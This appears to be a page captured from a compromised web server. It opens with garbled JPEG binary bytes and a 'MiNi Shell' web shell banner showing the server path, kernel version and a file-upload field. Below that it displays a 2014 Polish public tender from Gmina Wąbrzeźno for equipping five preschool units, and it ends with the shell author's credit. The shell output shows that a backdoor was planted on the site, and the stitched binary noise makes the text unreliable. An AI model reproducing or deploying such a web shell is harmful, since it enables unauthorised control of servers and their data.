JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/346068-N-2014.html

<p class="kh_header"><b>Wąbrzeźno: Modernizacja oddziałów przedszkolnych w Gminie Wąbrzeźno</b><br>
<b>Numer ogłoszenia: 346068 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wąbrzeźno , ul. Mickiewicza 21, 87-200 Wąbrzeźno, woj. kujawsko-pomorskie, tel. 056 6871800, faks 056 6881704.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wabrzezno.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja oddziałów przedszkolnych w Gminie Wąbrzeźno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest modernizacja pięciu oddziałów przedszkolnych, zlokalizowanych:
1)  w Jarantowicach - 1 oddział przedszkolny;
2)  w Myśliwcu - 1 oddział przedszkolny;  
3)  w Ryńsku - 2 oddziały przedszkolne;
4)  w Zieleniu - 1 oddział przedszkolny;
działających przy czterech szkołach, poprzez doposażenie istniejących placów zabaw, dostosowanie pomieszczeń i wyposażenie. 


2.Wykonawca dostarczy wszystkie fabrycznie nowe zamawiane artykuły do poszczególnych oddziałów przedszkolnych własnym transportem i dokona rozładunku w miejscu wskazanym przez zamawiającego.
3.Wykonawca dokona montażu dostarczonych elementów .
4.Wszystkie artykuły dostarczone przez wykonawcę muszą być zgodne z opisanymi przez zamawiającego w specyfikacji istotnych warunków zamówienia.  
5.Wszystkie dostarczane artykuły muszą posiadać  atesty, certyfikaty, deklaracje zgodności obowiązujące na terenie UE.
6.W przypadku określenia przedmiotu zamówienia przez wskazanie producenta, nazw własnych, znaków towarowych lub pochodzenia urządzeń i materiałów zamawiający informuję, że mają one jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych w stosunku do zaprojektowanych z zachowaniem tych samych standardów technicznych, technologicznych, jakościowych i funkcjonalnych. Przez produkty równoważne należy rozumieć urządzenia i materiały posiadające nie gorsze parametry techniczne i te same cechy funkcjonalne co wskazany konkretny z nazwy czy pochodzenia produkt. Jego jakość i parametry nie mogą być gorsze od wskazanych, a zastosowanie ich w żaden sposób nie może wpłynąć na prawidłowe funkcjonowanie rozwiązań technicznych przewidzianych w dokumentacji projektowej. Wykaz wszystkich przyjętych przez wykonawcę do wyceny materiałów lub urządzeń równoważnych wraz z podaniem nazwy producenta, typu urządzenia oraz dokumentów określających parametry techniczne musi zostać załączony do oferty.
7.Przedmiot zamówienia został podzielony na części, których opis znajduje się w pozycji IV. Zamówienia częściowe.
8.Projekt jest współfinansowany  przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie  9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.23.60.00-2, 48.19.00.00-6, 32.32.20.00-6, 32.00.00.00-3, 37.53.52.00-9, 37.50.00.00-3, 39.16.10.00-8, 39.22.00.00-0, 39.53.14.00-7, 39.15.00.00-8, 39.22.11.10-1, 39.70.00.00-9, 39.25.41.00-8, 39.24.11.00-4, 39.22.40.00-8, 44.41.00.00-7, 31.52.10.00-4, 39.51.40.00-8, 39.71.20.00-6, 44.41.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie konkretyzuje tego warunku.
Potwierdzeniem spełniania warunku będzie oświadczenie z art. 22 ust. 1 Pzp. Zamawiający dokona oceny spełniania warunku na podstawie dokumentów załączonych przez wykonawców do oferty stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie konkretyzuje tego warunku.
Potwierdzeniem spełniania warunku będzie oświadczenie z art. 22 ust. 1 Pzp. Zamawiający dokona oceny spełniania warunku na podstawie dokumentów załączonych przez wykonawców do oferty stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie konkretyzuje tego warunku.
Potwierdzeniem spełniania warunku będzie oświadczenie z art. 22 ust. 1 Pzp. Zamawiający dokona oceny spełniania warunku na podstawie dokumentów załączonych przez wykonawców do oferty stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie konkretyzuje tego warunku.
Potwierdzeniem spełniania warunku będzie oświadczenie z art. 22 ust. 1 Pzp. Zamawiający dokona oceny spełniania warunku na podstawie dokumentów załączonych przez wykonawców do oferty stosując formułę spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- zamawiający nie konkretyzuje tego warunku.
Potwierdzeniem spełniania warunku będzie oświadczenie z art. 22 ust. 1 Pzp. Zamawiający dokona oceny spełniania warunku na podstawie dokumentów załączonych przez wykonawców do oferty stosując formułę spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pisemne zobowiązanie innych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - jeżeli dotyczy, stosowne pełnomocnictwo - jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje wprowadzenie istotnych zmian postanowień zawartej umowy w stosunku do treści oferty złożonej przez wykonawcę, którego oferta została wybrana jako najkorzystniejsza w następujących okolicznościach:
1) jeżeli zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, 
    ekonomiczna lub techniczna za którą żadna ze stron nie ponosi odpowiedzialności skutkująca  brakiem możliwości 
    należytego i terminowego wykonania umowy zmianie ulegnie sposób i termin  realizacji zamówienia;
2) na skutek działania siły wyższej rozumianej jako zjawisko zewnętrzne, gwałtowne i nieoczekiwane,  któremu nie   
    można zapobiec przy dołożeniu nawet nadzwyczajnej staranności zaistnieje konieczność  zmiany terminu  
    wykonania zamówienia;
3) jeżeli zaistnieją okoliczności leżące po stronie zamawiającego w szczególności spowodowane  sytuacją finansową, 
    zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia 
    w chwili zawarcia umowy - zmianie może ulec sposób i terminy realizacji dostaw;
4) jeżeli  w  okresie  obowiązywania  umowy  zmianie  ulegnie  stawka  podatku  VAT  zmianie  ulegnie  wysokość
     wynagrodzenia wykonawcy (wartość netto pozostaje bez zmian).
5)  na wniosek Wykonawcy, za zgodą Zamawiającego, Wykonawca może:
    1)dokonać zmiany podwykonawcy,
    2)zrezygnować z udziału podwykonawcy w realizacji zamówienia,
    3)wskazać inny zakres podwykonawstwa niż przedstawiony w ofercie,
    4)powierzyć wykonanie części zamówienia podwykonawcom pomimo niewskazania w ofercie części zamówienia
      przeznaczonej do wykonania w ramach podwykonawstwa.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wabrzezno.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego ul. Mickiewicza 21, 87-200 Wąbrzeźno, I piętro pokój nr 104.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2014 godzina 09:00, miejsce: siedziba zamawiającego ul. Mickiewicza 21, 87-200 Wąbrzeźno, I piętro pokój nr 101 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 8.Projekt jest współfinansowany  przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie  9.1.1 Zmniejszanie nierówności w stopniu upowszechnienia edukacji przedszkolnej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja placów zabaw dla 5 oddziałów przedszkolnych poprzez doposażenie istniejących placów zabaw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja placów zabaw  polega na doposażeniu (dostawie i montażu)  istniejących placów zabaw  w  kosze na śmieci,  ławki, kosze na śmieci metalowe z daszkiem, sprężynowce, małpi gaj, karuzelę, tablicę do rysowania, grę Kółko i krzyżyk, lokomotywę z wagonem, domek dla dzieci, worki do skakania, karuzelę krzyżową, huśtawkę podwójną ważkę,  bujaki,  metalową zjeżdżalnię z daszkiem, huśtawki podwójne metalowe.

Szczegółową specyfikację (opis) dla Części 1 w podziale na poszczególne oddziały przedszkolne  zawiera załącznik nr  7.1 do specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.53.52.00-9, 37.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostosowanie pomieszczeń w 5 oddziałach przedszkolnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostosowania pomieszczeń w oddziałach przedszkolnych polega na dostawie i montażu miedzy innymi: dozowników mydła w płynie, dozowników ręczników papierowych, pojemników na papier toaletowy, luster, koszy na śmieci, podgrzewaczy wody, nakładek na sedesy dla dzieci, samozamykających baterii umywalkowych, lampy sufitowej, umywalek ceramicznych z postumentem, baterią i syfonem, wieszaków łazienkowych, półek na kubki, ręczników, suszarki do rąk, kubeczków plastikowych, wc kompaktów z deską sedesową. 

Szczegółową specyfikację (opis) dla Części 2 w podziale na poszczególne oddziały przedszkolne  zawiera załącznik nr  7.2 do specyfikacji istotnych warunków zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.41.10.00-4, 44.41.00.00-7, 31.52.10.00-4, 39.51.40.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wyposażenie 5 oddziałów przedszkolnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 Wyposażenie 5 oddziałów przedszkolnych           

Wyposażenie oddziałów przedszkolnych polega na dostawie i montażu  miedzy innymi: wyposażenia do utrzymania czystości w pomieszczeniach, wyposażenia lub doposażenia kuchni, mebli i wyposażenia, rolet kuchennych, wyposażenia wypoczynkowego, mebli do szatni i innych pomieszczeń gospodarczych, zabawek i pomocy dydaktycznych, pomocy dydaktycznych potrzebnych do realizacji zajęć, artykułów plastycznych potrzebnych do realizacji zajęć, kompletu wyposażenia zapewniającego bezpieczne warunki opieki nad dziećmi, sprzętu ICT, sprzętu audiowizualnego, tablic interaktywnych wraz z oprogramowaniem, kserokopiarki. 


Szczegółową specyfikację (opis) dla Części 3 w podziale na poszczególne oddziały przedszkolne zawiera załącznik nr 7.3 do specyfikacji istotnych warunków zamówienia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 30.23.60.00-2, 48.19.00.00-6, 32.32.20.00-6, 32.00.00.00-3, 37.50.00.00-3, 39.16.10.00-8, 39.22.00.00-0, 39.53.14.00-7, 39.15.00.00-8, 39.22.11.10-1, 39.70.00.00-9, 39.25.41.00-8, 39.24.11.00-4, 39.22.40.00-8, 44.41.00.00-7, 39.51.40.00-8, 39.71.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com